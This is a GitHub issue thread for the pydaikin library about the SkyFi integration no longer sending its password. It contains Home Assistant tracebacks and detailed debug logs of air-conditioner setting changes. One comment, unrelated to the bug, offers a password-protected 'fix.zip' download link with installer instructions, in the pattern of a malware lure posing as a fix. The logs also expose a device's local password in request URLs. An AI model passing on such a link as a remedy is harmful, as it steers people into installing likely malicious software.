### ISSUE TITLE
Skyfi password is not passed anymore

### ISSUE THREAD

**Issue by fredrike** [fredrike/pydaikin#20]
We have missed setting the password (this is apparently the skyfi integration that's not working).

Here are the changes.
https://github.com/fredrike/pydaikin/compare/v2.11.1...v2.13.4#diff-64a0d205181172c110e338cee7b146ec29c332840be6b57094e69fd70b19983a

Logs (from @RonFac):

```
Logger: homeassistant.config_entries
Source: config_entries.py:604
First occurred: 18:54:49 (1 occurrences)
Last logged: 18:54:49

Error setting up entry 192.168.1.137 for daikin
Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/config_entries.py", line 604, in async_setup
    result = await component.async_setup_entry(hass, self)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/components/daikin/__init__.py", line 49, in async_setup_entry
    daikin_api = await daikin_api_setup(
                 ^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/components/daikin/__init__.py", line 88, in daikin_api_setup
    device: Appliance = await DaikinFactory(
                        ^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/pydaikin/factory.py", line 26, in __new__
    await instance.__init__(*a, **kw)
  File "/usr/local/lib/python3.12/site-packages/pydaikin/factory.py", line 61, in __init__
    await self._generated_object.init()
  File "/usr/local/lib/python3.12/site-packages/pydaikin/daikin_skyfi.py", line 64, in init
    await self.update_status(self.HTTP_RESOURCES)
  File "/usr/local/lib/python3.12/site-packages/pydaikin/daikin_base.py", line 187, in update_status
    self.values.update_by_resource(resource, task.result())
                                             ^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/tenacity/asyncio/__init__.py", line 189, in async_wrapped
    return await copy(fn, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/tenacity/asyncio/__init__.py", line 111, in __call__
    do = await self.iter(retry_state=retry_state)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/tenacity/asyncio/__init__.py", line 153, in iter
    result = await action(retry_state)
             ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/tenacity/_utils.py", line 99, in inner
    return call(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/tenacity/__init__.py", line 398, in <lambda>
    self._add_action_func(lambda rs: rs.outcome.result())
                                     ^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/concurrent/futures/_base.py", line 449, in result
    return self.__get_result()
           ^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/concurrent/futures/_base.py", line 401, in __get_result
    raise self._exception
  File "/usr/local/lib/python3.12/site-packages/tenacity/asyncio/__init__.py", line 114, in __call__
    result = await fn(*args, **kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/pydaikin/daikin_base.py", line 145, in _get_resource
    async with self.session.get(
  File "/usr/local/lib/python3.12/site-packages/aiohttp/client.py", line 1353, in __aenter__
    self._resp = await self._coro
                 ^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/aiohttp/client.py", line 684, in _request
    await resp.start(conn)
  File "/usr/local/lib/python3.12/site-packages/aiohttp/client_reqrep.py", line 999, in start
    message, payload = await protocol.read()  # type: ignore[union-attr]
                       ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/aiohttp/streams.py", line 640, in read
    await self._waiter
asyncio.exceptions.CancelledError


Logger: pydaikin.daikin_base
Source: components/daikin/__init__.py:88
First occurred: 18:54:49 (1 occurrences)
Last logged: 18:54:49

Exception in TaskGroup: Cannot connect to host 192.168.1.137:2000 ssl:default [Connect call failed ('192.168.1.137', 2000)]
```

Working logs:

```log
2024-08-25 19:03:31.503 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-25 19:03:32.886 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=19:08&day=6&roomtemp=20&outsidetemp=19&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-25 19:03:34.270 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-25 19:03:34.271 DEBUG (MainThread) [homeassistant.components.daikin] Connection to 192.168.1.137 successful
2024-08-25 19:03:34.608 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-25 19:03:38.007 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=19:08&day=6&roomtemp=20&outsidetemp=19&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-25 19:04:34.614 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-25 19:04:38.949 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 3
2024-08-25 19:04:39.066 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientResponseError(RequestInfo(url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199'), method='GET', headers=<CIMultiDictProxy('Host': '192.168.1.137:2000', 'User-Agent': 'HomeAssistant/2024.7.4 aiohttp/3.9.5 Python/3.12', 'Accept': '/', 'Accept-Encoding': 'gzip, deflate, br')>, real_url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199')), ()) #0
2024-08-25 19:04:44.975 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 2
2024-08-25 19:04:47.036 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=19:09&day=6&roomtemp=20&outsidetemp=19&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-25 19:04:48.414 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-25 19:05:34.616 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-25 19:05:36.053 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=19:10&day=6&roomtemp=20&outsidetemp=19&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-25 19:05:37.441 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-25 19:06:34.617 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-25 19:06:34.738 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientResponseError(RequestInfo(url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199'), method='GET', headers=<CIMultiDictProxy('Host': '192.168.1.137:2000', 'User-Agent': 'HomeAssistant/2024.7.4 aiohttp/3.9.5 Python/3.12', 'Accept': '/', 'Accept-Encoding': 'gzip, deflate, br')>, real_url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199')), ()) #0
2024-08-25 19:06:36.020 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientResponseError(RequestInfo(url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199'), method='GET', headers=<CIMultiDictProxy('Host': '192.168.1.137:2000', 'User-Agent': 'HomeAssistant/2024.7.4 aiohttp/3.9.5 Python/3.12', 'Accept': '/', 'Accept-Encoding': 'gzip, deflate, br')>, real_url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199')), ()) https://github.com/home-assistant/core/issues/1
2024-08-25 19:06:41.491 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 3
2024-08-25 19:06:43.562 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=19:11&day=6&roomtemp=20&outsidetemp=19&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-25 19:06:44.958 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
```

Related issue on HA: https://github.com/home-assistant/core/issues/124095

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fredrike** [comment]
@RonFac, can you add some more logs where you actually change the settings too?

**Comment by fredrike** [comment]
17:45 - turn on heat
17:47 - increase temp to 22
17:49 - switch off
17:50 - turn on cooling
17:51 - switch to Fan only
17:52 - fan mode low
17:53 - off

```logs
2024-08-26 17:45:13.203 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'hot'}
2024-08-26 17:45:13.204 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:45:14.565 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:49&day=0&roomtemp=27&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:45:14.565 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:45:14.566 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=20.0&f=3&m=2']
2024-08-26 17:45:15.977 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:49&day=0&roomtemp=27&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:45:39.488 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-26 17:45:40.852 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:50&day=0&roomtemp=27&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:45:42.228 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:46:39.488 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-26 17:46:40.323 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '22'}
2024-08-26 17:46:40.323 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:46:41.349 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') #0
2024-08-26 17:46:42.356 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/issues/1
2024-08-26 17:46:43.364 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/pull/2
2024-08-26 17:46:44.374 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/pull/3
2024-08-26 17:46:44.383 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 3
2024-08-26 17:46:44.440 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientResponseError(RequestInfo(url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199'), method='GET', headers=<CIMultiDictProxy('Host': '192.168.1.137:2000', 'User-Agent': 'HomeAssistant/2024.7.4 aiohttp/3.9.5 Python/3.12', 'Accept': '/', 'Accept-Encoding': 'gzip, deflate, br')>, real_url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199')), ()) #0
2024-08-26 17:46:50.411 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 2
2024-08-26 17:46:50.485 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientResponseError(RequestInfo(url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199'), method='GET', headers=<CIMultiDictProxy('Host': '192.168.1.137:2000', 'User-Agent': 'HomeAssistant/2024.7.4 aiohttp/3.9.5 Python/3.12', 'Accept': '/', 'Accept-Encoding': 'gzip, deflate, br')>, real_url=URL('http://192.168.1.137:2000/ac.cgi?pass=17199')), ()) #0
2024-08-26 17:46:56.439 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 1
2024-08-26 17:46:58.426 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 0
2024-08-26 17:47:37.474 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '21'}
2024-08-26 17:47:37.474 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:47:38.814 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:38.815 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:47:38.815 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=21&f=3&m=2']
2024-08-26 17:47:39.489 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}', 'zones.cgi?pass={}']
2024-08-26 17:47:39.496 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') #0
2024-08-26 17:47:40.238 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:40.633 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '21'}
2024-08-26 17:47:40.633 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:47:40.642 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') #0
2024-08-26 17:47:41.671 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/issues/1
2024-08-26 17:47:41.864 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:43.322 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 3
2024-08-26 17:47:44.639 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '20'}
2024-08-26 17:47:44.639 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:47:44.640 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:47:44.640 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=20&f=3&m=2']
2024-08-26 17:47:44.653 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientConnectorError(ConnectionKey(host='192.168.1.137', port=2000, is_ssl=False, ssl=True, proxy=None, proxy_auth=None, proxy_headers_hash=6446973735908542371), ConnectionResetError(104, "Connect call failed ('192.168.1.137', 2000)")) #0
2024-08-26 17:47:45.665 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/issues/1
2024-08-26 17:47:45.742 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:45.743 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:47:45.744 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=21&f=3&m=2']
2024-08-26 17:47:46.673 DEBUG (MainThread) [pydaikin.daikin_skyfi] ClientOSError(104, 'Connection reset by peer') https://github.com/home-assistant/core/pull/2
2024-08-26 17:47:47.178 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:49.045 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:52.867 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '21'}
2024-08-26 17:47:52.867 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:47:54.208 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=20.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:47:54.209 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:47:54.209 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=21&f=3&m=2']
2024-08-26 17:47:55.629 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:48:04.864 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'stemp': '22'}
2024-08-26 17:48:04.865 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:48:06.198 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=21.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:48:06.199 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:48:06.199 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=22&f=3&m=2']
2024-08-26 17:48:07.626 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=22.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:52&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:49:02.201 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'off'}
2024-08-26 17:49:02.201 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['ac.cgi?pass={}']
2024-08-26 17:49:03.568 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=22.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:53&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:49:03.569 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:49:03.570 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=0']
2024-08-26 17:49:05.093 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=22.0&fanspeed=3&fanflags=1&acmode=2&tonact=0&toffact=0&prog=0&time=17:53&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:49:07.279 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:49:08.601 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:50:07.282 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:50:09.266 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:50:32.304 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'cool'}
2024-08-26 17:50:32.305 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:50:32.305 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:50:32.306 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=22.0&f=3&m=8']
2024-08-26 17:50:33.649 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=22.0&fanspeed=3&fanflags=1&acmode=8&tonact=0&toffact=0&prog=0&time=17:55&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:51:04.522 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'fan'}
2024-08-26 17:51:04.523 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:51:04.523 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:51:04.524 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=22.0&f=3&m=16']
2024-08-26 17:51:05.874 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=22.0&fanspeed=3&fanflags=1&acmode=16&tonact=0&toffact=0&prog=0&time=17:55&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:51:07.283 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:51:08.617 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:51:52.349 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'f_rate': 'low'}
2024-08-26 17:51:52.349 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:51:52.350 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:51:52.350 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=1&t=22.0&f=1&m=16']
2024-08-26 17:51:53.704 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=1&units=.&settemp=22.0&fanspeed=1&fanflags=1&acmode=16&tonact=0&toffact=0&prog=0&time=17:56&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:52:07.285 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:52:08.611 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:52:36.273 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'off'}
2024-08-26 17:52:36.274 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:52:36.274 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:52:36.275 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=0']
2024-08-26 17:52:39.281 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 3
2024-08-26 17:52:40.627 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 2
2024-08-26 17:52:41.988 DEBUG (MainThread) [pydaikin.daikin_base] ServerDisconnectedError 1
2024-08-26 17:52:48.358 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updating settings: {'mode': 'off'}
2024-08-26 17:52:48.358 DEBUG (MainThread) [pydaikin.daikin_base] Updating []
2024-08-26 17:52:48.359 DEBUG (MainThread) [pydaikin.daikin_skyfi] Updated values: <pydaikin.values.ApplianceValues object at 0x7f81118b90>
2024-08-26 17:52:48.359 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['set.cgi?pass={}&p=0']
2024-08-26 17:52:49.715 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing opmode=0&units=.&settemp=22.0&fanspeed=1&fanflags=1&acmode=16&tonact=0&toffact=0&prog=0&time=17:57&day=0&roomtemp=24&outsidetemp=20&louvre=0&zone=224&flt=0&test=0&errcode=&sensors=1
2024-08-26 17:53:07.287 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:53:08.614 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
2024-08-26 17:54:07.288 DEBUG (MainThread) [pydaikin.daikin_base] Updating ['zones.cgi?pass={}']
2024-08-26 17:54:09.280 DEBUG (MainThread) [pydaikin.daikin_skyfi] Parsing nz=3&zone1=Living&zone2=Bedrooms&zone3=Rumpus
